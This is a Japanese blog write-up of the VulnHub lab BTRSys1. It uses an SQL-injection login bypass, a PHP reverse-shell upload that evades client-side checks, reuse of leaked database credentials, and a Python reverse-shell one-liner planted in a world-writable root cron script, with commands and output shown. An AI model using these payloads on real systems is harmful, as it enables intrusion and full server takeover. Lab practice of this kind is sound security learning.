vulnhub BTRSys1 雑記
BTRSys1
サービス調査
# nmap -p- 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 06:59 EDT Nmap scan report for 10.10.10.12 Host is up (0.00031s latency). Not shown: 65532 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 80/tcp open http MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 18.49 seconds # nmap -p21,22,80 -sV --version-all 10.10.10.12 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 07:01 EDT Nmap scan report for 10.10.10.12 Host is up (0.00049s latency). PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) MAC Address: 08:00:27:F7:8B:15 (Oracle VirtualBox virtual NIC) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 20.36 seconds
気になりどころ
- [port 21] ftp vsftpd 3.0.2
- [port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
- [port 80] http Apache httpd 2.4.7 (Ubuntu)
詳細
[port 21] ftp vsftpd 3.0.2
# searchsploit vsftp ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Exploit Title | Path | (/usr/share/exploitdb/) ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | exploits/linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | exploits/windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | exploits/windows/dos/31819.pl vsftpd 2.3.2 - Denial of Service | exploits/linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | exploits/unix/remote/17491.rb ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------------- Shellcodes: No Result Papers: No Result
今後もvsfpdは殆ど刺さらなそう
[port 22] ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
OpenSSH < 6.6 SFTP (x64) - Command Execution | exploits/linux_x86-64/remote/45000.c OpenSSH < 6.6 SFTP - Command Execution | exploits/linux/remote/45001.py
何か刺さりそうな気がしたけど、SFTP無いし、sshのuserが分からん
[port 80] http Apache httpd 2.4.7 (Ubuntu)
# nikto -h 10.10.10.12 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.12 + Target Hostname: 10.10.10.12 + Target Port: 80 + Start Time: 2020-05-08 07:37:13 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.4.7 (Ubuntu) + Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.21 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + /config.php: PHP Config file may contain database IDs and passwords. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 7863 requests: 0 error(s) and 9 item(s) reported on remote host + End Time: 2020-05-08 07:38:28 (GMT-4) (75 seconds) --------------------------------------------------------------------------- + 1 host(s) tested # dirb http://10.10.10.12 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Sat May 9 02:08:34 2020 URL_BASE: http://10.10.10.12/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.12/ ---- ==> DIRECTORY: http://10.10.10.12/assets/ + http://10.10.10.12/index.php (CODE:200|SIZE:758) ==> DIRECTORY: http://10.10.10.12/javascript/ + http://10.10.10.12/server-status (CODE:403|SIZE:291) ==> DIRECTORY: http://10.10.10.12/uploads/ ---- Entering directory: http://10.10.10.12/assets/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.12/javascript/ ---- ==> DIRECTORY: http://10.10.10.12/javascript/jquery/ ---- Entering directory: http://10.10.10.12/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.12/javascript/jquery/ ---- + http://10.10.10.12/javascript/jquery/jquery (CODE:200|SIZE:252879) + http://10.10.10.12/javascript/jquery/version (CODE:200|SIZE:5) ----------------- END_TIME: Sat May 9 02:08:51 2020 DOWNLOADED: 13836 - FOUND: 4
apacheやphp自体には特に何も無さそう。
色々ディレクトリはあるが目ぼしいものは無く
どう考えても「/uploads/」には怪しさしかないのだが。
config.phpは単純なアクセスじゃ見れない。
login.phpは適当にやっても通らなさそう。
しかし、
# curl 10.10.10.12/login.php (snip) <div class="login-box"> <div class="lb-header"> <a href="#" class="active" id="login-box-link">Giris Yap</a> </div> <form method="Post" name="loginform" action="personel.php" class="email-login"> <div class="u-form-group"> <input type="email" id="user" name="kullanici_adi" placeholder="Kullanici Adi" required/> </div> <div class="u-form-group"> <input type="password" id="pwd" name="parola" placeholder="Parola" required/> </div> <div class="u-form-group"> <input type="button" value="Giris" onclick="control();" /> </div> </form> </div> <script type="text/javascript"> function control(){ var user = document.getElementById("user").value; var pwd = document.getElementById("pwd").value; var str=user.substring(user.lastIndexOf("@")+1,user.length); if((pwd == "'")){ alert("Hack Denemesi !!!"); } else if (str!="btrisk.com"){ alert("Yanlis Kullanici Bilgisi Denemektesiniz"); } else{ document.loginform.submit(); } } </script>
パスワードにシングルクォーテーションが含まれていると拒否されて、
メールアドレスに「@btrisk.com」が含まれていないと許されないよう。
以上を満たせば、適当な値でログインできるぽい?
その遷移先ページは
# curl 10.10.10.12/personel.php (snip) <script type="text/javascript"> // accept=".jpg,.png" function getFile(){ var filename = document.getElementById("dosya").value; var sonuc = ((/[.]/.exec(filename)) ? /[^.]+$/.exec(filename) : undefined); if((sonuc == "jpg") || (sonuc == "gif") || (sonuc == "png")){ document.myform.submit(); }else{ //mesaj alert("Yanlizca JPG,PNG dosyalari yukleyebilirsiniz."); return false; } } </script>
ファイルアップロードスクリプトがある?
スクリプトを動かす、ボタン等が見つからない。
改めて、login.phpへ戻る。
色々ログインを試していたら、「@btrisk.com」の前ならシングルクォーテーションを利用できる。
メールアドレスに「' or '1'='1'-- @btrisk.com」でSQLi通った模様。
SQLiが刺さればログインできたようで、getFile()のボタンを発見。
リバシェphpは、いつものpentestmonkeyのやつ「/usr/share/webshells/php/php-reverse-shell.php」
reverse-shellするphpファイルをアップロードしようとすると「jpg,gif,png」じゃないからダメと言われる。
しかし、画像ファイルじゃないとダメだという判断はjavascriptがサーバ側でなくクライアント側で行っているので、ブラウザのコンソールでgetFile()を弄ってやれば回避可能。
自分の場合、参照にファイルをセットした後、ブラウザのコンソールから「document.myform.submit();」を叩いてやることでuploadした。
さて、アップロードしたファイルはどこにアップロードされるのか。
それはやはり、「/uploads/」に決まっている。
実際、アップロード後に確認して見るとファイルが上がっている。
shell getchu!
window 1 # nc -nlvp 443
window 2 # curl 10.10.10.12/uploads/reverse.php
window 1 Linux BTRsys1 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:12 UTC 2014 i686 i686 i686 GNU/Linux 19:00:23 up 11:28, 0 users, load average: 0.00, 0.01, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $
他に、「/javascript/」は「Forbidden」だったが、
「/javascript/jquery/jquery」と「/javascript/jquery/version」は何故か200である。
after shell getchu
sqlデータベースにある資格情報の利用
まずは、先ほど見れなかった「config.php」を見に行く。
$ python -c "import pty;pty.spawn('/bin/bash')" www-data@BTRsys1:/var/www/html$ cd /var/www/html/ cd /var/www/html/ www-data@BTRsys1:/var/www/html$ ls ls assets gonder.php index.php personel.php uploads config.php hakkimizda.php login.php sorgu.php www-data@BTRsys1:/var/www/html$ cat config.php cat config.php <?php ///////////////////////////////////////////////////////////////////////////////////////// $con=mysqli_connect("localhost","root","toor","deneme"); if (mysqli_connect_errno()) { echo "Mysql Bağlantı hatası!: " . mysqli_connect_error(); } ///////////////////////////////////////////////////////////////////////////////////////// ?> www-data@BTRsys1:/var/www/html$
まさかmysqlのroot起動によるのroot権限奪取か?
www-data@BTRsys1:/var/www/html$ mysql -u root -p mysql -u root -p Enter password: toor Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 361 Server version: 5.5.55-0ubuntu0.14.04.1 (Ubuntu) Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> select sys_exec("id"); select sys_exec("id"); ERROR 1305 (42000): FUNCTION sys_exec does not exist
そんなことは無かったので色々見ていく。
mysql> show database; show database; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'database' at line 1 mysql> show databases; show databases; +--------------------+ | Database | +--------------------+ | information_schema | | deneme | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.00 sec) mysql> use information_schema; use information_schema; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +---------------------------------------+ | Tables_in_information_schema | +---------------------------------------+ | CHARACTER_SETS | | COLLATIONS | | COLLATION_CHARACTER_SET_APPLICABILITY | | COLUMNS | | COLUMN_PRIVILEGES | | ENGINES | | EVENTS | | FILES | | GLOBAL_STATUS | | GLOBAL_VARIABLES | | KEY_COLUMN_USAGE | | PARAMETERS | | PARTITIONS | | PLUGINS | | PROCESSLIST | | PROFILING | | REFERENTIAL_CONSTRAINTS | | ROUTINES | | SCHEMATA | | SCHEMA_PRIVILEGES | | SESSION_STATUS | | SESSION_VARIABLES | | STATISTICS | | TABLES | | TABLESPACES | | TABLE_CONSTRAINTS | | TABLE_PRIVILEGES | | TRIGGERS | | USER_PRIVILEGES | | VIEWS | | INNODB_BUFFER_PAGE | | INNODB_TRX | | INNODB_BUFFER_POOL_STATS | | INNODB_LOCK_WAITS | | INNODB_CMPMEM | | INNODB_CMP | | INNODB_LOCKS | | INNODB_CMPMEM_RESET | | INNODB_CMP_RESET | | INNODB_BUFFER_PAGE_LRU | +---------------------------------------+ 40 rows in set (0.00 sec) mysql> use deneme; use deneme; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; show tables; +------------------+ | Tables_in_deneme | +------------------+ | user | +------------------+ 1 row in set (0.00 sec) mysql> select * from user; select * from user; +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | ID | Ad_Soyad | Kullanici_Adi | Parola | BabaAdi | BabaMeslegi | AnneAdi | AnneMeslegi | KardesSayisi | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ | 1 | ismail kaya | ikaya@btrisk.com | asd123*** | ahmet | muhasebe | nazli | lokantaci | 5 | | 2 | can demir | cdmir@btrisk.com | asd123*** | mahmut | memur | gulsah | tuhafiyeci | 8 | +----+-------------+------------------+-----------+---------+-------------+---------+-------------+--------------+ 2 rows in set (0.00 sec) mysql>
これは色々使えそうな情報では?
www-data@BTRsys1:/var/www/html$ su - su - Password: asd123*** root@BTRsys1:~# id id uid=0(root) gid=0(root) groups=0(root)
root shell getchu!!
cronを見た
「find / -perm -2 -type f 2>/dev/null」という面白いコマンドを見つけたので早速使って見る。
www-data@BTRsys1:/var/www/html$ find / -perm -2 -type f 2>/dev/null find / -perm -2 -type f 2>/dev/null /var/tmp/cleaner.py.swp /var/log/cronlog (snip) /lib/log/cleaner.py
結果は殆どどうでも良いが、面白いものを発見。
「/var/log/cronlog」,「/lib/log/cleaner.py」とは一体何なのだろうか。
www-data@BTRsys1:/var/www/html$ cat /var/log/cronlog cat /var/log/cronlog */2 * * * * cleaner.py www-data@BTRsys1:/var/www/html$ cat /lib/log/cleaner.py cat /lib/log/cleaner.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') except: sys.exit() www-data@BTRsys1:/var/www/html$ ls -al /lib/log/ | grep cleaner ls -al /lib/log/ | grep cleaner -rwxrwxrwx 1 root root 96 Aug 13 2014 cleaner.py
「clearner.py」を書き換えてやればroot取れる。
今回は以下への書き換えを行う。
#! /usr/bin/env python import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("LHOST",LPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
「LHOST」と「LPORT」はお好みで。
attacker # python -m SimpleHTTPServer 80
victim www-data@BTRsys1:/var/www/html$ cd /lib/log cd /lib/log www-data@BTRsys1:/lib/log$ cd /tmp cd /tmp www-data@BTRsys1:/tmp$ wget 10.10.10.3/getroot.py wget 10.10.10.3/getroot.py --2020-05-09 20:03:17-- http://10.10.10.3/getroot.py Connecting to 10.10.10.3:80... connected. HTTP request sent, awaiting response... 200 OK Length: 238 [text/plain] Saving to: 'getroot.py' 100%[======================================>] 238 --.-K/s in 0s 2020-05-09 20:03:17 (47.3 MB/s) - 'getroot.py' saved [238/238] www-data@BTRsys1:/tmp$ cp ./getroot.py /lib/log/cleaner.py cp ./getroot.py /lib/log/cleaner.py www-data@BTRsys1:/tmp$
attacker (cron待ち) # nc -nlvp 8080 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::8080 Ncat: Listening on 0.0.0.0:8080 Ncat: Connection from 10.10.10.12. Ncat: Connection from 10.10.10.12:56889. /bin/sh: 0: can't access tty; job control turned off # id uid=0(root) gid=0(root) groups=0(root)
「/tmp」下だと、タイミングが悪いとcleaner.pyに 消される可能性があるので「/var/www/html/uploads」で作業する方が良いかもしれない。
学び
- 「find / -perm -2 -type f 2>/dev/null」は偉大では!?